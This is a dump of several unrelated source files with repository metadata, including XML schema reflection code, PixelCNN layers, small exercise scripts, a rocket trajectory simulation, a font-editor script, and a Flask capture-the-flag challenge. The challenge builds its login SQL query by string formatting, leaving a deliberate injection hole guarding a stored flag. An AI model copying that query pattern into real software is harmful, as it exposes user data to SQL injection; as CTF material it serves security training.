# a pointer
for uid in facet.uids:
facet.reflectAsPointer(uid,parent)
else:
if facet.uids is None:
facet.id=facet.fid
facet.assignUid()
n=1
facet.uids=[]
for vl in fval:
if vl in builtinPats:
nuid="bip..%d"%builtinPats.index(vl)
facet.reflectAsPointer(nuid,parent)
else:
f=facetReflect(parent,fn,vl)
nuid="%s..%d"%(facet.uid,n)
idAttr = XMLInfoset.Attribute(f, None, "id", None, nuid)
f.addAttribute(idAttr)
facet.uids.append(nuid)
n=n+1
else:
for vl in fval:
f=facetReflect(parent,fn,vl)
else:
f=facetReflect(parent,fn,fval)
f.reflectBoolean(f,"fixed",facet.fixed,0)
if facet.annotation is not None:
# note hack for list-vals -- annotation on last one
facet.annotation.reflect(f)
def facetReflect(parent,name,value):
f=XMLInfoset.Element(parent,psviSchemaNamespace,name)
parent.addChild(f)
if value is not None:
if name=="precision":
if value:
value="true"
else:
value="false"
elif name=="lexicalMappings":
value=" ".join(value)
elif type(value) not in (types.StringType,types.UnicodeType):
value=str(value)
if len(value) > 0:
if type(value) not in (types.StringType,types.UnicodeType):
value=str(value)
f.reflectString(f,"value",value,0)
return f
SimpleType.facetsReflect=facetsReflect
def fundamentalFacetsReflect(self,parent):
pass
# XXX
SimpleType.fundamentalFacetsReflect=fundamentalFacetsReflect
def elementReflect(self, parent=None):
# sys.stderr.write("using new reflect on %s, %s\n" % (self,parent));
# sys.stderr.write("%s" % self.__dict__);
if self.schemaInformation is not None:
# we are a validation start, so we need an ID _before_ recursion
self.id=gensym().id # for others to point to
# we need to build all the top-level defns also
# two passes -- assign names, to avoid internal defn's of named stuff
assignAllUIDs(self.schemaInformation)
if self.schemaNormalizedValue:
mixed=0
elif self.typeDefinition:
mixed=self.typeDefinition.contentType=='mixed'
else:
mixed=1
element = self.oldReflect(parent,mixed)
if self.schemaInformation is not None:
element.addAttribute(XMLInfoset.Attribute(element, None, "id", None, self.id))
reflectAllComponents(element,self.schemaInformation)
self.reflectString(element, "validationAttempted",
self.validationAttempted, 1,
psviSchemaNamespace)
if self.validationContext is not None:
self.reflectString(element,"validationContext",self.validationContext.id,0,
psviSchemaNamespace)
self.reflectString(element, "validity", self.validity, 1,
psviSchemaNamespace)
if self.errorCode:
self.reflectString(element,
"schemaErrorCode",'\n'.join(self.errorCode),1,
psviSchemaNamespace)
self.reflectString(element, "schemaNormalizedValue", self.schemaNormalizedValue, 1,
psviSchemaNamespace)
if self.typeDefinition: # XXX
self.typeDefinition.reflect(element)
self.reflectString(element, "memberTypeDefinition", self.memberTypeDefinition, 1,
psviSchemaNamespace)
if self.elementDeclaration is not None:
self.elementDeclaration.reflect(parent)
self.reflectBoolean(element, "nil", self.null, 1,
psviSchemaNamespace)
XMLInfoset.Element.psvReflect = elementReflect
class gensym:
nextid = 1
def __init__(self):
self.id = "g%s" % gensym.nextid
gensym.nextid = gensym.nextid + 1
def reflectAllComponents(element,schemaInformation):
for i in schemaInformation:
i.reflect(element)
def assignAllUIDs(schemaInformation):
for i in schemaInformation:
for c in i.schemaComponents:
if (isinstance(c,Component) or
isinstance(c,AbInitio)):
c.assignUid()
def attributeReflect(self, parent=None):
attribute = self.oldReflect(parent)
self.reflectString(attribute, "validationAttempted",
self.validationAttempted, 1,
psviSchemaNamespace)
if self.validationContext is not None:
self.reflectString(attribute,
"validationContext",self.validationContext.id,0,
psviSchemaNamespace)
self.reflectString(attribute, "validity", self.validity, 1,
psviSchemaNamespace)
if self.errorCode:
self.reflectString(attribute,
"schemaErrorCode",'\n'.join(self.errorCode),1,
psviSchemaNamespace)
self.reflectString(attribute, "schemaNormalizedValue", self.schemaNormalizedValue, 1,
psviSchemaNamespace)
if self.typeDefinition is not None: # XXX
self.typeDefinition.reflect(attribute)
self.reflectString(attribute, "memberTypeDefinition", self.memberTypeDefinition, 1,
psviSchemaNamespace)
if self.attributeDeclaration is not None:
self.attributeDeclaration.reflect(attribute)
XMLInfoset.Attribute.psvReflect = attributeReflect
XMLInfoset.Element.oldReflect = XMLInfoset.Element.reflect
XMLInfoset.Element.reflect = XMLInfoset.Element.psvReflect
XMLInfoset.Attribute.oldReflect = XMLInfoset.Attribute.reflect
XMLInfoset.Attribute.reflect = XMLInfoset.Attribute.psvReflect
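# The pattern used throughout this module, in miniature (hypothetical class
# names; an illustration only, not part of the original source): free
# functions are defined at module level and then attached to existing
# classes as methods ("monkey-patching"), keeping the original under a new
# name first so the extension can delegate to it:
#
#   def psvReflect(self, parent=None):
#       ...                              # extended behaviour
#       return self.oldReflect(parent)   # delegate to the original
#   SomeClass.oldReflect = SomeClass.reflect
#   SomeClass.reflect = psvReflect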
# $Log: reflect.py,v $
# Revision 1.10 2005-08-10 20:32:08 ht
# comment
#
# Revision 1.9 2004/10/04 11:36:47 ht
# token support for pDecimal
#
# Revision 1.8 2004/08/18 08:44:38 ht
# dump patterns properly
#
# Revision 1.7 2003/04/01 18:46:10 ht
# allow (but ignore) control arg to reflect doc
#
# Revision 1.6 2002/11/25 14:57:33 ht
# get fake variety early
#
# Revision 1.5 2002/10/08 20:32:16 ht
# fix one more XMLInfoset qualification, remove pointless statement
#
# Revision 1.4 2002/09/23 21:45:03 ht
# move to string methods from string library
#
# Revision 1.3 2002/09/23 14:03:14 ht
# fix an attr group dumping bug,
# set up so pattern facets are shared where possible to save on big built-in patterns
#
# Revision 1.2 2002/08/21 08:58:05 ht
# simpleTypeMap hack, attr bug
#
# Revision 1.1 2002/06/28 09:46:07 ht
# part of package now
#
|
[
"ahmed@manhag.org"
] |
ahmed@manhag.org
|
f291c903c72585e9ca8089e497ba10907c373013
|
67af9dc77608a6cd83fdf219b3b76000634c0634
|
/pixelcnn/layers.py
|
dab5d229536d0e0e042a5d70968fb13802ee7c03
|
[
"Apache-2.0"
] |
permissive
|
kngwyu/pytorch-pixelcnn
|
7b4d0bb0e8662ce976b5faede41249b94d81e03c
|
e59585d5d533de77c7b51a8e822da0264f2b56e5
|
refs/heads/master
| 2020-06-01T00:23:54.716580
| 2019-08-12T05:44:29
| 2019-08-12T05:44:29
| 190,556,770
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,522
|
py
|
import torch
from torch import nn, Tensor
from torch.nn import functional as F
from torch.nn.utils import weight_norm
from typing import Callable, Optional, Tuple
from .utils import down_cut, right_cut
class ConcatELU(nn.Module):
__constants__ = ['alpha']
def __init__(self, alpha: float = 1.) -> None:
super().__init__()
self.alpha = alpha
def forward(self, x: Tensor) -> Tensor:
return F.elu(torch.cat((x, -x), dim=1), self.alpha, inplace=True)
def extra_repr(self):
return 'alpha={}'.format(self.alpha)
class DownShiftedConv2d(nn.Module):
def __init__(
self,
in_channel: int,
out_channel: int,
kernel: Tuple[int, int] = (2, 3),
stride: int = 1,
right_shift: bool = False,
) -> None:
super().__init__()
kh, kw = kernel
# pad: (Left, Right, Top, Bottom)
pad = (kw - 1, 0, kh - 1, 0) if right_shift else ((kw - 1) // 2, (kw - 1) // 2, kh - 1, 0)
self.pad = nn.ZeroPad2d(pad)
self.conv = weight_norm(nn.Conv2d(in_channel, out_channel, kernel, stride))
def forward(self, x: Tensor) -> Tensor:
x = self.pad(x)
x = self.conv(x)
return x
class DownShiftedDeconv2d(nn.Module):
def __init__(
self,
in_channel: int,
out_channel: int,
kernel: Tuple[int, int] = (2, 3),
stride: int = 1,
right_shift: bool = False,
) -> None:
super().__init__()
if stride != 1 and stride != 2:
raise ValueError('Only 1 or 2 is allowed as stride size for DownShiftedDeconv2d')
pad = 0 if stride == 1 else 1
deconv = nn.ConvTranspose2d(in_channel, out_channel, kernel, stride, output_padding=pad)
self.deconv = weight_norm(deconv)
self.kernel = kernel
self.scaler = right_cut if right_shift else down_cut
def forward(self, x: Tensor) -> Tensor:
x = self.deconv(x)
return self.scaler(x, *self.kernel)
class Conv1x1(nn.Module):
def __init__(self, in_channel: int, out_channel: int) -> None:
super().__init__()
self.conv = weight_norm(nn.Conv2d(in_channel, out_channel, kernel_size=1))
def forward(self, x: Tensor) -> Tensor:
return self.conv(x)
class GatedResNet(nn.Module):
def __init__(
self,
in_channel: int,
conv: Callable[[int, int], nn.Module],
nonlinearity: nn.Module = ConcatELU(),
aux_enlargement: int = 0,
) -> None:
super().__init__()
nl_enlargement = 2 if isinstance(nonlinearity, ConcatELU) else 1
self.conv1 = conv(in_channel * nl_enlargement, in_channel)
if aux_enlargement == 0:
self.skip_op = None
else:
self.skip_op = Conv1x1(nl_enlargement * aux_enlargement * in_channel, in_channel)
self.nonlinearity = nonlinearity
self.dropout = nn.Dropout2d(0.5)
self.conv2 = conv(nl_enlargement * in_channel, nl_enlargement * in_channel)
def forward(self, x_orig: Tensor, aux: Optional[Tensor] = None) -> Tensor:
x = self.conv1(self.nonlinearity(x_orig))
if aux is not None and self.skip_op is not None:
x += self.skip_op(self.nonlinearity(aux))
x = self.nonlinearity(x)
x = self.dropout(x)
x = self.conv2(x)
x1, x2 = torch.chunk(x, 2, dim=1)
c3 = x1 * torch.sigmoid(x2)
return x_orig + c3
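# Minimal shape sanity check (an illustrative sketch, not part of the
# original module): wire a down-shifted conv into a GatedResNet block and
# run a dummy batch through it.
if __name__ == '__main__':
    net = GatedResNet(16, lambda cin, cout: DownShiftedConv2d(cin, cout))
    x = torch.randn(4, 16, 8, 8)  # (batch, channel, height, width)
    assert net(x).shape == x.shape  # the residual block preserves the shape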
|
[
"yuji.kngw.80s.revive@gmail.com"
] |
yuji.kngw.80s.revive@gmail.com
|
329a20b4c7110842b2129cc25616775c00bf8168
|
d22a2fbb9adb82644c5665242661bad172550552
|
/venv/ex44.py
|
b5c74a3b546e9fe734219d94756137000ecbe908
|
[] |
no_license
|
felipemanfrin/Python-Zero-ao-Zeno
|
e98ba3e4b974e88801b8bc947f461b125bc665b8
|
d6d08aa17071f77170bbd105452b0d05586131c8
|
refs/heads/master
| 2022-07-29T19:38:41.729178
| 2020-05-25T01:02:18
| 2020-05-25T01:02:18
| 265,356,280
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
preco = float(input('Enter the price of the product to be paid: '))
print('''Choose the payment method:
[1] Cash or check
[2] Cash by card (single payment)
[3] 2 installments on the card
[4] 3 or more installments on the card''')
opcao = int(input('Enter the option: '))
if opcao == 1:
    final = preco * 0.90
    print('The amount to pay with these methods is {}'.format(final))
elif opcao == 2:
    final = preco * 0.95
    print('The amount to pay is {}'.format(final))
elif opcao == 3:
    final = preco
    print('The amount to pay is {}'.format(final))
else:
    final = preco * 1.20
    print('The amount to pay is {}'.format(final))
|
[
"felipemanfrin@gmail.com"
] |
felipemanfrin@gmail.com
|
b1ef8a76cff5ccdd0bd13d20890f8c2df9f25e16
|
92578e316b0d1b760db85c449898c1560433a4bb
|
/backend/notes/urls.py
|
66f4181f4a81f45ec0f6d6b4f4f1882089f05ed7
|
[] |
no_license
|
turamant/dj_plus_vue
|
461dc6b7165ab7ecdf8eb3206ca9047b6db6c920
|
2d7b5ef897b418e5269b7b01c1fd6207ec5be4b8
|
refs/heads/main
| 2023-03-29T15:43:49.311175
| 2021-04-12T11:43:36
| 2021-04-12T11:43:36
| 357,166,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 311
|
py
|
from rest_framework import routers
from .views import NoteViewSet
# Create a router and register our ViewSet
router = routers.DefaultRouter()
router.register('notes', NoteViewSet)
# URLs are configured automatically by the router
urlpatterns = router.urls
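# For reference, a minimal sketch of the ViewSet this router registers
# (hypothetical: the real definition lives in .views and may differ):
#
# from rest_framework import viewsets
# from .models import Note
# from .serializers import NoteSerializer
#
# class NoteViewSet(viewsets.ModelViewSet):
#     queryset = Note.objects.all()
#     serializer_class = NoteSerializer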
|
[
"tur1amant@gmail.com"
] |
tur1amant@gmail.com
|
95bc2c171d57e18811811934b2b5b0cc902e8cc5
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_137/544.py
|
d93a3ffd436e017136abd200f2f8988eb7da45e9
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 545
|
py
|
import cPickle as pickle
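# Looks up precomputed answers keyed by 'n-m-k' from c.pickle; the only case
# handled inline is k == n*m - 1, where a single free cell 'c' remains.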
def main():
d = pickle.load(open('c.pickle', 'rb'))
num_of_tests = int(raw_input())
for test_i in range(num_of_tests):
n, m, k = map(int, raw_input().split())
ans = d['%s-%s-%s' % (n, m, k)]
if k == n * m - 1:
ans = 'c' + '*' * (m - 1) + '\n'
for i in range(n - 1):
ans += '*' * m + '\n'
print "Case #%d:" % (test_i + 1)
if ans[-1] == '\n':
ans = ans[:-1]
print ans
if __name__ == "__main__":
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
61ef2940a1d29bb6e311bce2f96ea1678f79606b
|
f11ecb59dab63af605c6e5f256ee59e00447ecc1
|
/763-partition-labels.py
|
f873de4ea39b18121ba64673b1decc40b496d1ef
|
[] |
no_license
|
floydchenchen/leetcode
|
626d55f72ec914764385ce82b0f3c57f5a7e9de8
|
9d9e0c08992ef7dbd9ac517821faa9de17f49b0e
|
refs/heads/master
| 2022-10-07T20:33:55.728141
| 2020-06-08T16:09:17
| 2020-06-08T16:09:17
| 269,525,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
# 763. Partition Labels
# A string S of lowercase letters is given. We want to partition this string into as many parts as possible so that each letter appears in at most one part,
# and return a list of integers representing the size of these parts.
# Example 1:
# Input: S = "ababcbacadefegdehijhklij"
# Output: [9,7,8]
# Explanation:
# The partition is "ababcbaca", "defegde", "hijhklij".
# This is a partition so that each letter appears in at most one part.
# A partition like "ababcbacadefegde", "hijhklij" is incorrect, because it splits S into less parts.
from collections import defaultdict
class Solution:
# sliding window
def partitionLabels(self, S: str) -> List[int]:
# a map to store a char's last occurring location
pos = defaultdict(int)
for i, char in enumerate(S):
pos[char] = i
partition = []
l, r = 0, 0
for i, char in enumerate(S):
# update the right index
r = max(r, pos[char])
if i == r:
partition.append(r - l + 1)
l = r + 1
return partition
|
[
"chen2918@umn.edu"
] |
chen2918@umn.edu
|
207c5d7f1c7e8039b7aad55a5d63284589af7e80
|
8ee5dfd87ce637a46c496853f55d32f226b238f8
|
/backend/Experiments/Data/PosControl/Plotter.py
|
06270322e2630227c68dd802b20334c0aec05b2d
|
[] |
no_license
|
cholazzzb/react-parrotar2-swarm
|
71eb6be8682e00015103af3df69a6cc01f7a919f
|
dccdfa841184af6ec62910f50c3335b812cd0201
|
refs/heads/main
| 2023-06-16T01:24:57.169242
| 2021-07-08T03:54:08
| 2021-07-08T03:54:08
| 354,490,913
| 0
| 0
| null | 2021-07-08T03:54:08
| 2021-04-04T08:15:37
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,245
|
py
|
import matplotlib.pyplot as plt
# from tum_PSO import tum_PSO
# from custom_PSO import custom_PSO
from custom_PSO_z import custom_PSO_z
from custom_PSO_z_lama import custom_PSO_z_lama
from fine_tuning import fine_tuning
from fine_tuning_disturbance import fine_tuning_disturbance
time = fine_tuning_disturbance["time"]
xPos = fine_tuning_disturbance["xPos"]
yPos = fine_tuning_disturbance["yPos"]
zPos = fine_tuning_disturbance["zPos"]
# range(170) for POS AND TIME
# for i in range(350):
# time.pop()
# xPos.pop()
# yPos.pop()
# zPos.pop()
xPosTarget = []
yPosTarget = []
for data in yPos:
xPosTarget.append(1.95)
yPosTarget.append(1.27)
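# Equivalent without the loop (sketch): the setpoints are constant, so
# list multiplication builds the same arrays.
# xPosTarget = [1.95] * len(yPos)
# yPosTarget = [1.27] * len(yPos)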
# ----- POS AND TIME -----
plt.plot(time, xPos, label="Marvelmind X coordinate")
plt.plot(time, xPosTarget, label="Setpoint X")
plt.plot(time, yPos, label="Marvelmind Y coordinate")
plt.plot(time, yPosTarget, label="Setpoint Y")
plt.title("Position Control")
plt.xlabel('Time (seconds)')
plt.ylabel('Coordinate (meters)')
# plt.ylim(0.5, 2.5)
plt.legend(loc="lower right")
# ----- MAP -----
# plt.scatter(xPos, yPos)
# plt.title("Posisi X dan Y")
# plt.xlabel('Koordinat x (meter)')
# plt.ylabel('Koordinat y (meter)')
# plt.ylim(0.85, 2.163)
plt.show()
# Set point: X =1.95, Y = 1.27
|
[
"nicsphehehe@gmail.com"
] |
nicsphehehe@gmail.com
|
3257ffae5f57a16cff15a802d965f1ae58e0f0e7
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/tensorflow/contrib/graph_editor/subgraph.py
|
caf690f68dcdece5c40a3526673d99e70d7d5a26
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:a739031b57fa33ef7882c98b7eefeea5d588318fc9ef255db3f17b609ce8653c
size 25666
|
[
"github@cuba12345"
] |
github@cuba12345
|
62eb3d4653f8cab219e631ac922207e24e6b6594
|
f77327128a8da9702ae3443e2171bc7485ceb915
|
/main.py
|
e592f25e87e990be6bcc7a514fea58257fd7615d
|
[] |
no_license
|
SimeonYS/cadence
|
0eeba6a54c03ffb2d55466f9d8de6f1b1662002f
|
cdaef13c85a03e031a0050c89c17249cd7d83125
|
refs/heads/main
| 2023-03-31T08:24:41.408507
| 2021-03-31T10:14:01
| 2021-03-31T10:14:01
| 353,312,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 74
|
py
|
from scrapy import cmdline
cmdline.execute("scrapy crawl cadence".split())
|
[
"simeon.simeonov@ADPVT.com"
] |
simeon.simeonov@ADPVT.com
|
e04235d8de2b8dbad77d7369cee71f1946da3910
|
eabc8c12802053683ab0b42d95135c0b777945a1
|
/rooms/room-h/main.py
|
09fffc0f9de7cd8371014ddd2af950e79eb386fa
|
[] |
no_license
|
Hacker0x01/44con-ctf-2019
|
e569fb3722520411f9928c9b0d5d21d91c2ee8ca
|
4a86c14d488dd1515615d702942172fa5e7c5fc2
|
refs/heads/master
| 2023-08-08T19:34:11.081687
| 2019-09-13T22:22:30
| 2019-09-13T22:22:30
| 208,354,485
| 18
| 7
| null | 2023-07-22T16:09:35
| 2019-09-13T22:12:05
|
Python
|
UTF-8
|
Python
| false
| false
| 1,960
|
py
|
from flask import Flask, request
import hashlib, json, os, sys
from socket import *
import sqlite3
def query(sql, commit=False):
c = conn.cursor()
c.execute(sql.replace('%', '%%'))
if commit:
conn.commit()
else:
return c.fetchall()
def setup():
global conn
conn = sqlite3.connect(':memory:')
def sha1(data):
return hashlib.sha1(data).hexdigest()
conn.create_function('sha1', 1, sha1)
query('''
CREATE TABLE users (username text, password text)
''', commit=True)
query('''
INSERT INTO users (username, password) VALUES ('eldon', sha1('chess'))
''', commit=True)
query('''
CREATE TABLE flag (value text)
''', commit=True)
query('''
INSERT INTO flag (value) VALUES ('I had in mind 5ome7hing.a.little m0re~radical.')
''', commit=True)
app = Flask(__name__)
home = '''
<!doctype html>
<html>
<body>
<form action="/login" method="POST">
USERNAME: <input type="text" name="username"><br>
PASSWORD: <input type="password" name="password"><br>
<input type="submit" value="LOG IN">
</form>
</body>
</html>
'''
login = '''
<!doctype html>
<html>
<body>
<b>%s</b>
</body>
</html>
'''
@app.route('/')
def hello():
return home
@app.route('/login', methods=['POST'])
def login():
try:
username, password = request.form['username'], request.form['password']
data = query('SELECT username FROM users WHERE username=\'%s\' AND password=sha1(\'%s\')' % (
username.replace('\\', '\\\\').replace('\'', '\\\''),
password
))
if len(data) == 0:
return '<b>INVALID CREDENTIALS</b>'
else:
return '<b>INSUFFICIENT ACCESS FOR USER %s</b>' % data[0][0]
except:
return '<b>ERROR</b>'
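# Annotation (not part of the original challenge): login() builds its SQL
# with % string formatting, which is the injection surface this room is
# built around. A hardened variant would use sqlite3 parameter binding:
#   c.execute('SELECT username FROM users WHERE username=? AND password=sha1(?)',
#             (username, password))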
if __name__ == "__main__":
if os.fork() > 0:
while True:
try:
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', 80))
break
except:
pass
sys.exit(0)
os.setsid()
os.umask(0)
if os.fork() > 0:
sys.exit(0)
setup()
app.run(host='127.0.0.1', port=80, threaded=False, processes=1)
|
[
"cody.brocious@gmail.com"
] |
cody.brocious@gmail.com
|
ac5e879ff023cf1256f3cf20aecf9aed14119993
|
3df1bdc21727f40ef0ee296bf137bf3190ad00ec
|
/astrodynamics/Rocket_Seminar_Series/projectile_newtonian_gravity.py
|
5b9b13fb403c9a761d3080689f4c4aae63aefae2
|
[] |
no_license
|
tin97-bb/Python
|
c2b30829fd4e14c50963dc4074e87ef06869cebe
|
3cedc7d5bef2af46b6618026cd7a41e61700ce62
|
refs/heads/master
| 2023-07-29T07:06:15.116923
| 2021-09-13T17:04:48
| 2021-09-13T17:04:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,204
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 4 21:56:24 2021
@author: carlos
"""
####Import all the modules we need
import numpy as np ###numeric python
import matplotlib.pyplot as plt ###matlab style plotting
import scipy.integrate as sci ##integration toolbox
plt.close("all")
##DEFINE SOME CONSTANT PARAMETERS
G = 6.6742*10**-11 # Gravitational constant (SI units)
###PLANET
###EARTH
Rplanet = 6357000.0 #meters
mplanet = 5.972e24 #kg
###KERBIN
#Rplanet = 600000 #meters
#mplanet = 5.2915158*10**22 #
##ROCKET
mass = 640.0/1000.0 ##kg
##Gravitational Acceleration Model
def gravity(z):
global Rplanet,mplanet
r = np.sqrt(z**2)
if r < Rplanet:
accel = 0.0
else:
accel = G*mplanet/(r**3)*r
return accel
###Equations of Motion
###F = m*a = m*zddot
## z is the distance from the planet center (meters);
## altitude above the surface is z - Rplanet
## zdot is the velocity
## zddot is the acceleration
###Second Order Differential Equation
def Derivatives(state,t):
###Globals
global mass
#state vector
z = state[0]
velz = state[1]
#Compute zdot - Kinematic Relationship
zdot = velz
###Compute the Total Forces
    ###Gravity
gravityF = -gravity(z)*mass
###Aerodynamics
aeroF = 0.0
###Thrust
thrustF = 0.0
Forces = gravityF + aeroF + thrustF
#Compute Acceleration
zddot = Forces/mass
#Compute the statedot
statedot = np.asarray([zdot,zddot])
return statedot
###########EVERYTHING BELOW HERE IS THE MAIN SCRIPT###
###Test Surface Gravity
print('Surface Gravity (m/s^2) = ',gravity(Rplanet))
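###Hypothetical add-on (not in the original script): sanity-check the
###initial speed against the escape velocity v_esc = sqrt(2*G*M/R);
###25*331 m/s is below v_esc for Earth, so the trajectory stays bound
v_esc = np.sqrt(2.0*G*mplanet/Rplanet)
print('Escape Velocity (m/s) = ',v_esc)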
###Initial Conditions
z0 = Rplanet ##m
velz0 = 25*331.0 #m/s
stateinitial = np.asarray([z0,velz0])
##Time window
tout = np.linspace(0,345,1000)
###Numerical Integration Call
stateout = sci.odeint(Derivatives,stateinitial,tout)
###Rename variables
zout = stateout[:,0]
altitude = zout - Rplanet
velzout = stateout[:,1]
###Plot
###ALTITUDE
plt.plot(tout,altitude)
plt.xlabel('Time (sec)')
plt.ylabel('Altitude (m)')
plt.grid()
###VELOCITY
plt.figure()
plt.plot(tout,velzout)
plt.xlabel('Time (sec)')
plt.ylabel('Normal Speed (m/s)')
plt.grid()
|
[
"cmontalvo@southalabama.edu"
] |
cmontalvo@southalabama.edu
|
22b4ec30dc144453b9f66f4de4f090bee518ffaf
|
ecf89d17601ee16ef176a9fc0ce497e4e685cc21
|
/python/112.py
|
f74559351f115ee03b2fd2f5a3f7192f843447a5
|
[] |
no_license
|
kartikeya-shandilya/project-euler
|
daa984cda1a476a6f29b80d4b86ca03f9292d910
|
6265db7c5a8fedc3ded627829ce6040e8c8542d4
|
refs/heads/master
| 2021-01-21T04:27:36.649729
| 2020-10-13T00:25:52
| 2020-10-13T00:25:52
| 26,404,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 371
|
py
|
#!/usr/bin/python
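# Project Euler 112: a number is "bouncy" when its digits are neither
# monotonically non-decreasing nor non-increasing; find the least n at
# which the proportion of bouncy numbers first reaches 99%.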
cnt=0
for i in range(1,2500000):
j=str(i)
tag1="incr"
for k in range(0,len(j)-1):
if j[k]>j[k+1]:
tag1="bouncy"
break
tag2="decr"
for k in range(0,len(j)-1):
if j[k]<j[k+1]:
tag2="bouncy"
break
if tag1=="bouncy" and tag2=="bouncy":
cnt+=1
# print i,tag1,tag2
if cnt/(1.0*i)>0.99:
print "yes",i,cnt
break
#print "no",i,cnt
|
[
"kartikeya.shandilya@gmail.com"
] |
kartikeya.shandilya@gmail.com
|
9404f4f2483b622d387c7959245a892b14e573ae
|
291a7d6758a3e05ccb84edb9b5d5a2d8cc3cdc9c
|
/Components/Component Problem Finder.py
|
1c5659bcd073ec2b33f0c66706066ca93b699ae8
|
[
"Apache-2.0"
] |
permissive
|
Mark2Mark/Glyphs-Scripts
|
19d4235225ddba8b64de244891af60863706f374
|
204ad6d92fb14f87a7d183d7acf28b9a678ace02
|
refs/heads/master
| 2023-04-07T08:21:21.777294
| 2023-03-06T17:46:29
| 2023-03-06T17:46:29
| 81,827,927
| 1
| 0
| null | 2017-02-13T13:27:28
| 2017-02-13T13:27:28
| null |
UTF-8
|
Python
| false
| false
| 19,917
|
py
|
#MenuTitle: Component Problem Finder
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__ = """
Find and report possible issues with components and corner components.
"""
import vanilla
from timeit import default_timer as timer
def camelCaseSplit(str):
words = [[str[0]]]
for c in str[1:]:
if words[-1][-1].islower() and c.isupper():
words.append(list(c))
else:
words[-1].append(c)
return [''.join(word) for word in words]
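# Example (annotation added for clarity):
# camelCaseSplit("unalignedComponents") -> ['unaligned', 'Components']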
def reportTimeInNaturalLanguage(seconds):
if seconds > 60.0:
timereport = "%i:%02i minutes" % (seconds // 60, seconds % 60)
elif seconds < 1.0:
timereport = "%.2f seconds" % seconds
elif seconds < 20.0:
timereport = "%.1f seconds" % seconds
else:
timereport = "%i seconds" % seconds
return timereport
def orthodoxComponentsForGlyph(thisGlyph):
glyphInfo = thisGlyph.glyphInfo
if glyphInfo:
componentInfo = glyphInfo.components
if componentInfo:
glyphNameTuple = tuple(c.name for c in componentInfo)
return glyphNameTuple
return None
def nameStrippedOfSuffixes(glyphName):
	# str.find returns -1 when there is no period, and -1 % (len+1) == len,
	# so the slice keeps the whole name in that case
	return glyphName[:glyphName.find(".") % (len(glyphName) + 1)]
def layerAdheresToStructure(thisLayer, glyphNameTuple):
layerComponents = thisLayer.components
numOfLayerComponents = len(layerComponents)
if numOfLayerComponents != len(glyphNameTuple):
return False
for i in range(numOfLayerComponents):
thisComponentName = thisLayer.components[i].componentName
orthodoxComponentName = glyphNameTuple[i]
if thisComponentName != orthodoxComponentName:
componentBaseName = nameStrippedOfSuffixes(thisComponentName)
orthodoxBaseName = nameStrippedOfSuffixes(orthodoxComponentName)
if componentBaseName != orthodoxBaseName:
return False
return True
class ComponentProblemFinder(object):
prefID = "com.mekkablue.ComponentProblemFinder"
prefs = (
"composablesWithoutComponents",
"unusualComponents",
"lockedComponents",
"nestedComponents",
"orphanedComponents",
"emptyComponents",
"unalignedComponents",
"scaledComponents",
"unproportionallyScaledComponents",
"rotatedComponents",
"mirroredComponents",
"shiftedComponents",
"detachedCornerComponents",
"transformedCornerComponents",
"includeAllGlyphs",
"includeNonExporting",
"reuseTab",
)
def __init__(self):
# Window 'self.w':
windowWidth = 280
windowHeight = 520
windowWidthResize = 0 # user can resize width by this value
windowHeightResize = 0 # user can resize height by this value
self.w = vanilla.FloatingWindow(
(windowWidth, windowHeight), # default window size
"Component Problem Finder", # window title
minSize=(windowWidth, windowHeight), # minimum size (for resizing)
maxSize=(windowWidth + windowWidthResize, windowHeight + windowHeightResize), # maximum size (for resizing)
autosaveName=self.domain("mainwindow") # stores last window position and size
)
# UI elements:
linePos, inset, lineHeight = 12, 15, 22
self.w.descriptionText = vanilla.TextBox((inset, linePos + 2, -inset, 14), "New tab with glyphs containing components:", sizeStyle='small', selectable=True)
linePos += lineHeight
self.w.composablesWithoutComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Composable glyphs without components", value=False, callback=self.SavePreferences, sizeStyle='small'
)
self.w.composablesWithoutComponents.getNSButton(
).setToolTip_("Lists glyphs that could be component-based (because they have a recipe in Glyph Info), but are lacking components.")
linePos += lineHeight
self.w.unusualComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Unusual composites (or wrong order)", value=False, callback=self.SavePreferences, sizeStyle='small'
)
self.w.unusualComponents.getNSButton().setToolTip_("Lists composite glyphs that contain components different from the default recipe in Glyph Info.")
linePos += lineHeight
self.w.lockedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Locked components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.lockedComponents.getNSButton().setToolTip_("Lists glyphs that contain a locked component on any of its layers.")
linePos += lineHeight
self.w.nestedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Nested components", value=False, callback=self.SavePreferences, sizeStyle='small')
